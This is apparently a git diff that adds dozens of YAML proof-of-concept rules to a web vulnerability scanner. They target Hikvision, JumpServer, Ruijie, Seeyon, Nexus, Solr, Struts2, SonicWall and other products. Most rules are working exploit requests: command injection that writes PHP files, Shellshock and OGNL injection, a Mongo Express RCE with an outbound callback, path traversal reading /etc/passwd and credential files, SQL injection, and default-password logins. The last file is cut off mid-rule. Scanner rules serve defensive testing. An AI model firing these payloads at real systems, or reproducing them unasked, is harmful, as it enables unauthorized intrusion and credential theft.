- https://www.pwnwiki.org/index.php?title=H3C_SecParh%E5%A0%A1%E5%A3%98%E6%A9%9F_get_detail_view.php_%E4%BB%BB%E6%84%8F%E7%94%A8%E6%88%B6%E7%99%BB%E9%8C%84%E6%BC%8F%E6%B4%9E

11
WebScan/pocs/hikvision-cve-2017-7921.yml Normal file
View File

@@ -0,0 +1,11 @@
name: poc-yaml-hikvision-cve-2017-7921
rules:
- method: GET
path: /system/deviceInfo?auth=YWRtaW46MTEK
follow_redirects: false
expression: |
response.status == 200 && response.body.bcontains(b"<firmwareVersion>") && response.headers["content-type"] == "application/xml"
detail:
author: whwlsfb(https://github.com/whwlsfb)
links:
- https://packetstormsecurity.com/files/144097/Hikvision-IP-Camera-Access-Bypass.html

21
WebScan/pocs/iis6.0-put.yml Normal file
View File

@@ -0,0 +1,21 @@
name: poc-yaml-iis-put-getshell
set:
filename: randomLowercase(6)
fileContent: randomLowercase(6)
rules:
- method: PUT
path: /{{filename}}.txt
body: |
{{fileContent}}
expression: |
response.status == 201
- method: GET
path: /{{filename}}.txt
follow_redirects: false
expression: |
response.status == 200 && response.body.bcontains(bytes(fileContent))
detail:
author: Cannae(github.com/thunderbarca)
links:
- https://www.cnblogs.com/-mo-/p/11295400.html

21
WebScan/pocs/jumpserver-unauth-rce.yml Normal file
View File

@@ -0,0 +1,21 @@
name: poc-yaml-jumpserver-unauth-rce
set:
r1: randomLowercase(5)
rules:
- method: GET
path: /api/v1/authentication/connection-token/
follow_redirects: false
expression: |
response.status == 401 && response.content_type.contains("application/json") && response.body.bcontains(b"not_authenticated")
- method: GET
path: /api/v1/authentication/connection-token/?user-only={{r1}}
follow_redirects: false
expression: |
response.status == 404 && response.content_type.contains("application/json") && response.body.bcontains(b"\"\"")
detail:
author: mvhz81
info: jumpserver unauth read logfile + jumpserver rce
links:
- https://s.tencent.com/research/bsafe/1228.html
- https://mp.weixin.qq.com/s/KGRU47o7JtbgOC9xwLJARw
- https://github.com/jumpserver/jumpserver/releases/download/v2.6.2/jms_bug_check.sh

21
WebScan/pocs/jumpserver-unauth-rce2.yml Normal file
View File

@@ -0,0 +1,21 @@
name: poc-yaml-jumpserver-unauth-rce
set:
r1: randomLowercase(5)
rules:
- method: GET
path: /api/v1/users/connection-token/
follow_redirects: false
expression: |
response.status == 401 && response.content_type.contains("application/json") && response.body.bcontains(b"not_authenticated")
- method: GET
path: /api/v1/users/connection-token/?user-only={{r1}}
follow_redirects: false
expression: |
response.status == 404 && response.content_type.contains("application/json") && response.body.bcontains(b"\"\"")
detail:
author: mvhz81
info: jumpserver unauth read logfile + jumpserver rce
links:
- https://s.tencent.com/research/bsafe/1228.html
- https://mp.weixin.qq.com/s/KGRU47o7JtbgOC9xwLJARw
- https://github.com/jumpserver/jumpserver/releases/download/v2.6.2/jms_bug_check.sh

12
WebScan/pocs/kingsoft-v8-default-password.yml Normal file
View File

@@ -0,0 +1,12 @@
name: poc-yaml-kingsoft-v8-default-password
rules:
- method: POST
path: /inter/ajax.php?cmd=get_user_login_cmd
body: "{\"get_user_login_cmd\":{\"name\":\"admin\",\"password\":\"21232f297a57a5a743894a0e4a801fc3\"}}"
follow_redirects: true
expression: |
response.status == 200 && response.body.bcontains(b"ADMIN") && response.body.bcontains(b"userSession")
detail:
author: B1anda0(https://github.com/B1anda0)
links:
- https://idc.wanyunshuju.com/aqld/2123.html

12
WebScan/pocs/kingsoft-v8-file-read.yml Normal file
View File

@@ -0,0 +1,12 @@
name: poc-yaml-kingsoft-v8-file-read
rules:
- method: GET
path: >-
/htmltopdf/downfile.php?filename=/windows/win.ini
follow_redirects: false
expression: |
response.status == 200 && (response.body.bcontains(b"for 16-bit app support") || response.body.bcontains(b"[extensions]")) && response.headers["Content-Type"].contains("application/zip")
detail:
author: kzaopa(https://github.com/kzaopa)
links:
- https://github.com/PeiQi0/PeiQi-WIKI-POC/blob/b6f8fbfef46ad1c3f8d5715dd19b00ca875341c2/_book/PeiQi_Wiki/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E9%87%91%E5%B1%B1/%E9%87%91%E5%B1%B1%20V8%20%E7%BB%88%E7%AB%AF%E5%AE%89%E5%85%A8%E7%B3%BB%E7%BB%9F%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md

11
WebScan/pocs/landray-oa-custom-jsp-fileread-2.yml Normal file
View File

@@ -0,0 +1,11 @@
name: poc-yaml-landray-oa-custom-jsp-fileread
rules:
- method: POST
path: /sys/ui/extend/varkind/custom.jsp
body: var={"body":{"file":"file:///c://windows/win.ini"}}
expression: |
response.status == 200 && response.body.bcontains(b"for 16-bit app support")
detail:
author: B1anda0(https://github.com/B1anda0)
links:
- https://mp.weixin.qq.com/s/TkUZXKgfEOVqoHKBr3kNdw

11
WebScan/pocs/landray-oa-custom-jsp-fileread.yml Normal file
View File

@@ -0,0 +1,11 @@
name: poc-yaml-landray-oa-custom-jsp-fileread
rules:
- method: POST
path: /sys/ui/extend/varkind/custom.jsp
body: var={"body":{"file":"file:///etc/passwd"}}
expression: |
response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
detail:
author: B1anda0(https://github.com/B1anda0)
links:
- https://mp.weixin.qq.com/s/TkUZXKgfEOVqoHKBr3kNdw

12
WebScan/pocs/lanproxy-cve-2021-3019-lfi.yml Normal file
View File

@@ -0,0 +1,12 @@
name: poc-yaml-lanproxy-cve-2021-3019-lfi
rules:
- method: GET
path: "/../conf/config.properties"
expression: |
response.status == 200 && response.body.bcontains(bytes(string(b"config.admin.username"))) && response.body.bcontains(bytes(string(b"config.admin.password"))) && response.content_type.contains("application/octet-stream")
detail:
author: pa55w0rd(www.pa55w0rd.online/)
Affected Version: "lanproxy 0.1"
links:
- https://github.com/ffay/lanproxy/issues/152
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3019

11
WebScan/pocs/laravel-debug-info-leak.yml Normal file
View File

@@ -0,0 +1,11 @@
name: poc-yaml-laravel-debug-info-leak
rules:
- method: POST
path: /
follow_redirects: false
expression: >
response.status == 405 && response.body.bcontains(b"MethodNotAllowedHttpException") && response.body.bcontains(b"Environment &amp; details") && (response.body.bcontains(b"vendor\\laravel\\framework\\src\\Illuminate\\Routing\\RouteCollection.php") || response.body.bcontains(b"vendor/laravel/framework/src/Illuminate/Routing/RouteCollection.php"))
detail:
author: Dem0ns (https://github.com/dem0ns)
links:
- https://github.com/dem0ns/improper/tree/master/laravel/5_debug

11
WebScan/pocs/laravel-improper-webdir.yml Normal file
View File

@@ -0,0 +1,11 @@
name: poc-yaml-laravel-improper-webdir
rules:
- method: GET
path: /storage/logs/laravel.log
follow_redirects: false
expression: >
response.status == 200 && (response.content_type.contains("plain") || response.content_type.contains("octet-stream")) && (response.body.bcontains(b"vendor\\laravel\\framework") || response.body.bcontains(b"vendor/laravel/framework")) && (response.body.bcontains(b"stacktrace") || response.body.bcontains(b"Stack trace"))
detail:
author: Dem0ns (https://github.com/dem0ns)
links:
- https://github.com/dem0ns/improper

21
WebScan/pocs/mongo-express-cve-2019-10758.yml Normal file
View File

@@ -0,0 +1,21 @@
name: poc-yaml-mongo-express-cve-2019-10758
set:
reverse: newReverse()
reverseURL: reverse.url
rules:
- method: POST
path: /checkValid
headers:
Authorization: Basic YWRtaW46cGFzcw==
body: >-
document=this.constructor.constructor('return process')().mainModule.require('http').get('{{reverseURL}}')
follow_redirects: true
expression: >
reverse.wait(5)
detail:
vulnpath: '/checkValid'
author: fnmsd(https://github.com/fnmsd)
description: 'Mongo Express CVE-2019-10758 Code Execution'
links:
- https://github.com/masahiro331/CVE-2019-10758
- https://www.twilio.com/blog/2017/08/http-requests-in-node-js.html

18
WebScan/pocs/netentsec-ngfw-rce.yml Normal file
View File

@@ -0,0 +1,18 @@
name: poc-yaml-netentsec-ngfw-rce
set:
r1: randomLowercase(4)
r2: randomLowercase(4)
r3: randomInt(800000000, 1000000000)
r4: randomInt(800000000, 1000000000)
rules:
- method: POST
path: /directdata/direct/router
body: {"action":"SSLVPN_Resource", "method":"deleteImage", "data":[{"data":["/var/www/html/{{r1}};expr {{r3}} + {{r4}} > /var/www/html/{{r2}}"]}], "type":"rpc", "tid":17, "f8839p7rqtj":"="}
expression: response.status == 200
- method: GET
path: /{{r2}}
expression: response.status == 200 && response.body.bcontains(bytes(string(r3 + r4)))
detail:
author: jingling(https://github.com/shmilylty)
links:
- https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g

20
WebScan/pocs/nexus-cve-2019-7238.yml Normal file
View File

File diff suppressed because one or more lines are too long

21
WebScan/pocs/nexus-cve-2020-10199.yml Normal file
View File

@@ -0,0 +1,21 @@
name: poc-yaml-nexus-cve-2020-10199
set:
r1: randomInt(40000, 44800)
r2: randomInt(40000, 44800)
rules:
- method: POST
path: "/rest/beta/repositories/go/group"
headers:
Content-Type: application/json
body: |
{"name": "internal","online": true,"storage": {"blobStoreName": "default","strictContentTypeValidation": true},"group": {"memberNames": ["$\\c{ {{r1}} * {{r2}} }"]}}
expression: |
response.status == 400 && response.body.bcontains(bytes(string(r1 * r2)))
detail:
Affected Version: "nexus<3.21.2"
author: kingkk(https://www.kingkk.com/)
links:
- https://cert.360.cn/report/detail?id=b3eaa020cf5c0e9e92136041e4d713bb
- https://www.cnblogs.com/magic-zero/p/12641068.html
- https://securitylab.github.com/advisories/GHSL-2020-011-nxrm-sonatype
- https://support.sonatype.com/hc/en-us/articles/360044882533-CVE-2020-10199-Nexus-Repository-Manager-3-Remote-Code-Execution-2020-03-31

20
WebScan/pocs/nexus-cve-2020-10204.yml Normal file
View File

@@ -0,0 +1,20 @@
name: poc-yaml-nexus-cve-2020-10204
set:
r1: randomInt(40000, 44800)
r2: randomInt(40000, 44800)
rules:
- method: POST
path: "/extdirect"
headers:
Content-Type: application/json
body: |
{"action":"coreui_User","method":"update","data":[{"userId":"anonymous","version":"1","firstName":"Anonymous","lastName":"User2","email":"anonymous@example.org","status":"active","roles":["$\\c{{{r1}}*{{r2}}}"]}],"type":"rpc","tid":28}
expression: |
response.status == 200 && response.body.bcontains(bytes(string(r1 * r2)))
detail:
Affected Version: "nexus<3.21.2"
author: kingkk(https://www.kingkk.com/)
links:
- https://cert.360.cn/report/detail?id=b3eaa020cf5c0e9e92136041e4d713bb
- https://www.cnblogs.com/magic-zero/p/12641068.html
- https://support.sonatype.com/hc/en-us/articles/360044882533-CVE-2020-10199-Nexus-Repository-Manager-3-Remote-Code-Execution-2020-03-31

22
WebScan/pocs/nexus-default-password.yml Normal file
View File

@@ -0,0 +1,22 @@
name: poc-yaml-nexus-default-password
rules:
- method: GET
path: /nexus/service/siesta/capabilities
expression: >
response.status == 401
- method: GET
path: /nexus/service/local/authentication/login
headers:
Accept: application/json
Authorization: Basic YWRtaW46YWRtaW4xMjM=
expression: >
response.status == 200
- method: GET
path: /nexus/service/siesta/capabilities
expression: >
response.status == 200
detail:
author: Soveless(https://github.com/Soveless)
Affected Version: "Nexus Repository Manager OSS"
links:
- https://help.sonatype.com/learning/repository-manager-3/first-time-installation-and-setup/lesson-1%3A--installing-and-starting-nexus-repository-manager

13
WebScan/pocs/phpmyadmin-setup-deserialization.yml Normal file
View File

@@ -0,0 +1,13 @@
name: poc-yaml-phpmyadmin-setup-deserialization
rules:
- method: POST
path: /scripts/setup.php
body: >-
action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}
follow_redirects: false
expression: >-
response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
detail:
author: p0wd3r
links:
- https://github.com/vulhub/vulhub/tree/master/phpmyadmin/WooYun-2016-199433

12
WebScan/pocs/qizhi-fortressaircraft-unauthorized.yml Normal file
View File

@@ -0,0 +1,12 @@
name: poc-yaml-qizhi-fortressaircraft-unauthorized
rules:
- method: GET
path: >-
/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm
expression: |
response.status == 200 && response.body.bcontains(b"错误的id") && response.body.bcontains(b"审计管理员") && response.body.bcontains(b"事件审计")
detail:
author: we1x4n(https://we1x4n.com/)
links:
- https://mp.weixin.qq.com/s/FjMRJfCqmXfwPzGYq5Vhkw

12
WebScan/pocs/rockmongo-default-password.yml Normal file
View File

@@ -0,0 +1,12 @@
name: poc-yaml-rockmongo-default-password
rules:
- method: POST
path: /index.php?action=login.index&host=0
body: more=0&host=0&username=admin&password=admin&db=&lang=zh_cn&expire=3
follow_redirects: false
expression: |
response.status == 302 && response.headers["location"] == "/index.php?action=admin.index&host=0"
detail:
author: B1anda0(https://github.com/B1anda0)
links:
- https://www.runoob.com/mongodb/working-with-rockmongo.html

24
WebScan/pocs/ruijie-eg-info-leak.yml Normal file
View File

@@ -0,0 +1,24 @@
name: poc-yaml-ruijie-eg-info-leak
rules:
- method: POST
path: /login.php
headers:
Content-Type: application/x-www-form-urlencoded
body: |
username=admin&password=admin?show+webmaster+user
expression: "true"
search: |
{"data":".*?(?P<username>\w+)\s?(?P<password>\w+)","status":1}
- method: POST
path: /login.php
headers:
Content-Type: application/x-www-form-urlencoded
body: |
username={{username}}&password={{password}}
expression: |
response.status == 200 && response.body.bcontains(b"{\"data\":\"0\",\"status\":1}")
detail:
author: Search?=Null
description: "Ruijie EG网关信息泄漏"
links:
- https://mp.weixin.qq.com/s/jgNyTHSqWA5twyk5tfSQUQ

29
WebScan/pocs/ruijie-eg-rce.yml Normal file
View File

@@ -0,0 +1,29 @@
name: poc-yaml-ruijie-eg-rce
set:
r1: randomLowercase(4)
r2: randomLowercase(4)
phpcode: >
"<?php echo '" + r1 + "'; unlink(__FILE__); ?>"
payload: base64(phpcode)
rules:
- method: POST
path: "/guest_auth/guestIsUp.php"
headers:
User-Agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36"
Accept-Encoding: "gzip, deflate"
Content-Type: "application/x-www-form-urlencoded; charset=UTF-8"
body: |
ip=127.0.0.1|echo '{{payload}}' | base64 -d > {{r2}}.php&mac=00-00
expression: |
response.status == 200
- method: GET
path: "/guest_auth/{{r2}}.php"
headers:
User-Agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36"
Accept-Encoding: "gzip, deflate"
expression: |
response.body.bcontains(bytes(r1))
detail:
author: White(https://github.com/WhiteHSBG)
links:
- https://xz.aliyun.com/t/9016?page=1

15
WebScan/pocs/ruijie-nbr1300g-cli-password-leak.yml Normal file
View File

@@ -0,0 +1,15 @@
name: poc-yaml-ruijie-nbr1300g-cli-password-leak
rules:
- method: POST
path: /WEB_VMS/LEVEL15/
follow_redirects: false
headers:
Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
body: |
command=show webmaster user&strurl=exec%04&mode=%02PRIV_EXEC&signname=Red-Giant.
expression: |
response.status == 200 && response.body.bcontains(bytes("webmaster level 2 username guest password guest"))
detail:
author: abbin777
links:
- http://wiki.peiqi.tech/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7NBR%201300G%E8%B7%AF%E7%94%B1%E5%99%A8%20%E8%B6%8A%E6%9D%83CLI%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.html

20
WebScan/pocs/ruijie-rce-cnvd-2021-09650.yml Normal file
View File

@@ -0,0 +1,20 @@
name: poc-yaml-ruijie-rce-cnvd-2021-09650
set:
r1: randomLowercase(9)
rules:
- method: POST
path: /guest_auth/guestIsUp.php
body: mac = 1 & ip = 127.0.0.1 | id > {{r1}}.txt
follow_redirects: false
expression: |
response.status == 200
- method: GET
path: /guest_auth/{{r1}}.txt
follow_redirects: false
expression: |
response.status == 200 && response.body.bcontains(b"uid")
detail:
author: jdr
info: CNVD-2021-09650(Ruijie-EWEB网管系统 RCE)
links:
- https://github.com/opsxcq/exploit-CVE-2014-6271/

11
WebScan/pocs/ruijie-uac-cnvd-2021-14536.yml Normal file
View File

@@ -0,0 +1,11 @@
name: poc-yaml-ruijie-uac-cnvd-2021-14536
rules:
- method: GET
path: /login.php
follow_redirects: false
expression: |
response.status == 200 && response.body.bcontains(b"<title>RG-UAC登录页面</title>") && response.body.bcontains(b"get_dkey_passwd") && "\"password\":\"[a-f0-9]{32}\"".bmatches(response.body)
detail:
author: jweny(https://github.com/jweny)
links:
- https://mp.weixin.qq.com/s?__biz=Mzg3NDU2MTg0Ng==&mid=2247483972&idx=1&sn=b51678c6206a533330b0279454335065

22
WebScan/pocs/saltstack-cve-2021-25282-file-write.yml Normal file
View File

@@ -0,0 +1,22 @@
name: poc-yaml-saltstack-cve-2021-25282-file-write
set:
r1: randomLowercase(5)
rules:
- method: GET
path: /run
follow_redirects: false
expression: |
response.status == 200 && response.content_type.icontains("application/json") && response.body.bcontains(b"wheel_async") && response.body.bcontains(b"runner_async")
- method: POST
path: /run
headers:
Content-type: application/json
body: >-
{"eauth":"auto","client":"wheel_async","fun":"pillar_roots.write","data":"{{r1}}","path":"../../../../../../../../../tmp/{{r1}}"}
follow_redirects: false
expression: |
response.status == 200 && response.content_type.icontains("application/json") && "salt/wheel/d*".bmatches(response.body)
detail:
author: jweny(https://github.com/jweny)
links:
- https://www.anquanke.com/post/id/232748

11
WebScan/pocs/seeyon-a6-employee-info-leak.yml Normal file
View File

@@ -0,0 +1,11 @@
name: poc-yaml-seeyon-a6-employee-info-leak
rules:
- method: GET
path: /yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0
expression:
response.status == 200 && response.body.bcontains(b"[Content_Types].xml") && response.body.bcontains(b"Excel.Sheet")
detail:
author: sakura404x
version: 致远A6
links:
- https://github.com/apachecn/sec-wiki/blob/c73367f88026f165b02a1116fe1f1cd2b8e8ac37/doc/unclassified/zhfly3351.md

13
WebScan/pocs/seeyon-a6-test-jsp-sql.yml Normal file
View File

@@ -0,0 +1,13 @@
name: poc-yaml-seeyon-a6-test-jsp-sql
set:
rand: randomInt(200000000, 210000000)
rules:
- method: GET
path: /yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20md5({{rand}}))
expression:
response.status == 200 && response.body.bcontains(bytes(md5(string(rand))))
detail:
author: sakura404x
version: 致远A6
links:
- https://github.com/apachecn/sec-wiki/blob/c73367f88026f165b02a1116fe1f1cd2b8e8ac37/doc/unclassified/zhfly3346.md

16
WebScan/pocs/seeyon-ajax-unauthorized-access.yml Normal file
View File

@@ -0,0 +1,16 @@
name: poc-yaml-seeyon-ajax-unauthorized-access
rules:
- method: GET
path: /seeyon/thirdpartyController.do.css/..;/ajax.do
expression: |
response.status == 200 && response.body.bcontains(bytes("java.lang.NullPointerException:null"))
- method: GET
path: /seeyon/personalBind.do.jpg/..;/ajax.do?method=ajaxAction&managerName=mMOneProfileManager&managerMethod=getOAProfile
expression: |
response.status == 200 && response.body.bcontains(bytes("MMOneProfile")) && response.body.bcontains(bytes("productTags")) && response.body.bcontains(bytes("serverIdentifier")) && response.content_type.contains("application/json")
detail:
author: x1n9Qi8
links:
- https://mp.weixin.qq.com/s/bHKDSF7HWsAgQi9rTagBQA
- https://buaq.net/go-53721.html

11
WebScan/pocs/seeyon-cnvd-2020-62422-readfile.yml Normal file
View File

@@ -0,0 +1,11 @@
name: poc-yaml-seeyon-cnvd-2020-62422-readfile
rules:
- method: GET
path: /seeyon/webmail.do?method=doDownloadAtt&filename=index.jsp&filePath=../conf/datasourceCtp.properties
follow_redirects: false
expression: response.status == 200 && response.content_type.icontains("application/x-msdownload") && response.body.bcontains(b"ctpDataSource.password")
detail:
author: Aquilao(https://github.com/Aquilao)
info: seeyon readfile(CNVD-2020-62422)
links:
- https://www.cnvd.org.cn/flaw/show/CNVD-2020-62422

10
WebScan/pocs/seeyon-session-leak.yml Normal file
View File

@@ -0,0 +1,10 @@
name: poc-yaml-seeyon-session-leak
rules:
- method: GET
path: /yyoa/ext/https/getSessionList.jsp?cmd=getAll
expression:
response.status == 200 && response.body.bcontains(b"<SessionList>\r\n<Session>\r\n<usrID>")
detail:
author: sakura404x
links:
- https://github.com/apachecn/sec-wiki/blob/c73367f88026f165b02a1116fe1f1cd2b8e8ac37/doc/unclassified/zhfly3345.md

13
WebScan/pocs/seeyon-setextno-jsp-sql.yml Normal file
View File

@@ -0,0 +1,13 @@
name: poc-yaml-seeyon-setextno-jsp-sql
set:
rand: randomInt(200000000, 210000000)
rules:
- method: GET
path: /yyoa/ext/trafaxserver/ExtnoManage/setextno.jsp?user_ids=(17)%20union%20all%20select%201,2,@@version,md5({{rand}})%23
expression:
response.status == 200 && response.body.bcontains(bytes(md5(string(rand))))
detail:
author: sakura404x
version: 致远A6
links:
- https://github.com/apachecn/sec-wiki/blob/c73367f88026f165b02a1116fe1f1cd2b8e8ac37/doc/unclassified/zhfly3348.md

19
WebScan/pocs/seeyon-unauthoried.yml Normal file
View File

@@ -0,0 +1,19 @@
name: poc-yaml-seeyon-unauthoried
rules:
- method: POST
path: "/seeyon/thirdpartyController.do"
expression: "true"
body: |
method=access&enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04%2BLjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4
search: >-
JSESSIONID=(?P<session>.+?)
- method: GET
path: "/seeyon/main.do"
headers:
Cookie: JSESSIONID={{session}}
expression: |
response.status == 200 && response.body.bcontains(b"当前已登录了一个用户,同一窗口中不能登录多个用户")
detail:
author: whami-root(https://github.com/whami-root)
links:
- https://github.com/whami-root

12
WebScan/pocs/shiro.yml
View File

@@ -1,12 +0,0 @@
name: poc-yaml-shiro
rules:
- method: GET
path: /
headers:
Cookie: rememberMe=1
expression: |
"Set-Cookie" in response.headers && response.headers["Set-Cookie"].contains("rememberMe")
detail:
author: test
links:
- https://baidu.com/shiro

25
WebScan/pocs/showdoc-uploadfile.yml Normal file
View File

@@ -0,0 +1,25 @@
name: poc-yaml-showdoc-uploadfile
set:
r1: randomLowercase(4)
r2: randomLowercase(4)
rules:
- method: POST
path: /index.php?s=/home/page/uploadImg
headers:
Content-Type: "multipart/form-data; boundary=--------------------------835846770881083140190633"
follow_redirects: false
body: "----------------------------835846770881083140190633\nContent-Disposition: form-data; name=\"editormd-image-file\"; filename=\"{{r1}}.<>php\"\nContent-Type: text/plain\n\n<?php echo \"{{r2}}\"; unlink(__FILE__); ?>\n----------------------------835846770881083140190633--"
expression: |
response.status == 200 && response.body.bcontains(b"success")
search: |
(?P<date>\d{4}-\d{2}-\d{2})\\/(?P<file>[a-f0-9]+\.php)
- method: GET
path: /Public/Uploads/{{date}}/{{file}}
follow_redirects: false
expression: |
response.status == 200 && response.body.bcontains(bytes(r2))
detail:
author: White(https://github.com/WhiteHSBG)
Affected Version: "showdoc <= 2.8.6"
links:
- https://github.com/star7th/showdoc/pull/1059

25
WebScan/pocs/solr-fileread1.yml Normal file
View File

@@ -0,0 +1,25 @@
name: poc-yaml-solr-fileread1
rules:
- method: GET
path: "/solr/admin/cores?indexInfo=false&wt=json"
expression: response.status == 200 && response.body.bcontains(b"responseHeader")
search: >-
"name":"(?P<core>.+?)"
- method: POST
path: "/solr/{{core}}/config"
body: |
{"set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}
expression: |
response.body.bcontains(b"responseHeader")
- method: POST
path: "/solr/{{core}}/debug/dump?param=ContentStreams"
headers:
Content-Type: application/x-www-form-urlencoded
body: |
stream.url=file:///etc/passwd
expression: |
response.status == 200 && r'root:[x*]:0:0:'.bmatches(response.body)
detail:
author: whami-root(https://github.com/whami-root)
links:
- https://mp.weixin.qq.com/s?__biz=Mzg3NDU2MTg0Ng==&mid=2247484117&idx=1&sn=2fdab8cbe4b873f8dd8abb35d935d186

25
WebScan/pocs/solr-fileread2.yml Normal file
View File

@@ -0,0 +1,25 @@
name: poc-yaml-solr-fileread2
rules:
- method: GET
path: "/solr/admin/cores?indexInfo=false&wt=json"
expression: "true"
search: >-
"name":"(?P<core>.+?)"
- method: POST
path: "/solr/{{core}}/config"
body: |
{"set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}
expression: |
response.body.bcontains(b"responseHeader")
- method: POST
path: "/solr/{{core}}/debug/dump?param=ContentStreams"
headers:
Content-Type: application/x-www-form-urlencoded
body: |
stream.url=file:///c://windows/win.ini
expression: |
response.status == 200 && response.body.bcontains(b"for 16-bit app support")
detail:
author: whami-root(https://github.com/whami-root)
links:
- https://mp.weixin.qq.com/s?__biz=Mzg3NDU2MTg0Ng==&mid=2247484117&idx=1&sn=2fdab8cbe4b873f8dd8abb35d935d186

16
WebScan/pocs/sonicwall-ssl-vpn-rce.yml Normal file
View File

@@ -0,0 +1,16 @@
name: poc-yaml-sonicwall-ssl-vpn-rce
set:
r1: randomInt(40000, 44800)
r2: randomInt(1140000, 1144800)
rules:
- method: GET
path: /cgi-bin/jarrewrite.sh
follow_redirects: false
headers:
X-Test: () { :; }; echo ; /bin/bash -c 'expr {{r1}} - {{r2}}'
expression: |
response.status == 200 && response.body.bcontains(bytes(string(r1 - r2)))
detail:
author: sharecast
links:
- https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/

12
WebScan/pocs/spring-actuator-heapdump-file.yml Normal file
View File

@@ -0,0 +1,12 @@
name: poc-yaml-spring-actuator-heapdump-file
rules:
- method: HEAD
path: /actuator/heapdump
follow_redirects: true
expression: |
response.status == 200 && response.content_type.contains("application/octet-stream")
detail:
author: AgeloVito
info: spring-actuator-heapdump-file
links:
- https://www.cnblogs.com/wyb628/p/8567610.html

12
WebScan/pocs/spring-heapdump-file.yml Normal file
View File

@@ -0,0 +1,12 @@
name: poc-yaml-spring-heapdump-file
rules:
- method: HEAD
path: /heapdump
follow_redirects: true
expression: |
response.status == 200 && response.content_type.contains("application/octet-stream")
detail:
author: AgeloVito
info: spring-heapdump-file
links:
- https://www.cnblogs.com/wyb628/p/8567610.html

9
WebScan/pocs/springboot-env-unauth.yml Normal file
View File

@@ -0,0 +1,9 @@
name: poc-yaml-springboot-env-unauth
rules:
- method: GET
path: /env
expression: |
response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"java.version") && response.body.bcontains(b"os.arch")
detail:
links:
- https://github.com/LandGrey/SpringBootVulExploit

9
WebScan/pocs/springboot-env-unauth2.yml Normal file
View File

@@ -0,0 +1,9 @@
name: poc-yaml-springboot-env-unauth
rules:
- method: GET
path: /actuator/env
expression: |
response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"java.version") && response.body.bcontains(b"os.arch")
detail:
links:
- https://github.com/LandGrey/SpringBootVulExploit

15
WebScan/pocs/struts2-045-1.yml Normal file
View File

@@ -0,0 +1,15 @@
name: poc-yaml-struts2_045-1
set:
r1: randomInt(800, 1000)
r2: randomInt(800, 1000)
rules:
- method: GET
path: /
headers:
Content-Type: ${#context["com.opensymphony.xwork2.dispatcher.HttpServletResponse"].addHeader("Keyvalue",{{r1}}*{{r2}})}.multipart/form-data
follow_redirects: true
expression: |
"Keyvalue" in response.headers && response.headers["Keyvalue"].contains(string(r1 * r2))
detail:
author: shadown1ng(https://github.com/shadown1ng)

12
WebScan/pocs/struts2-045-2.yml Normal file
View File

@@ -0,0 +1,12 @@
name: poc-yaml-struts2_045-2
rules:
- method: GET
path: /
headers:
Content-Type: "%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).(#res=@org.apache.struts2.ServletActionContext@getResponse()).(#res.setContentType('text/html;charset=UTF-8')).(#res.getWriter().print('struts2_security_')).(#res.getWriter().print('check')).(#res.getWriter().flush()).(#res.getWriter().close())}"
follow_redirects: true
expression: |
response.body.bcontains(b"struts2_security_check")
detail:
author: shadown1ng(https://github.com/shadown1ng)

16
WebScan/pocs/struts2-046-1.yml Normal file
View File

@@ -0,0 +1,16 @@
name: poc-yaml-struts2_046-1
set:
r1: b"-----------------------------\r\nContent-Disposition:\x20form-data;\x20name=\"test\";\x20filename=\"%{(#_=\'multipart/form-data\').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[\'com.opensymphony.xwork2.ActionContext.container\']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).(#res=@org.apache.struts2.ServletActionContext@getResponse()).(#res.setContentType(\'text/html;charset=UTF-8\')).(#res.getWriter().print(\'struts2_security_\')).(#res.getWriter().print(\'check\')).(#res.getWriter().flush()).(#res.getWriter().close())}\x00b\"\r\nContent-Type:\x20text/plain\r\n\r\n\r\n-----------------------------"
rules:
- method: POST
path: /
headers:
Content-Type: multipart/form-data; boundary=---------------------------
follow_redirects: true
body: |
{{r1}}
expression: |
response.body.bcontains(b"struts2_security_check")
detail:
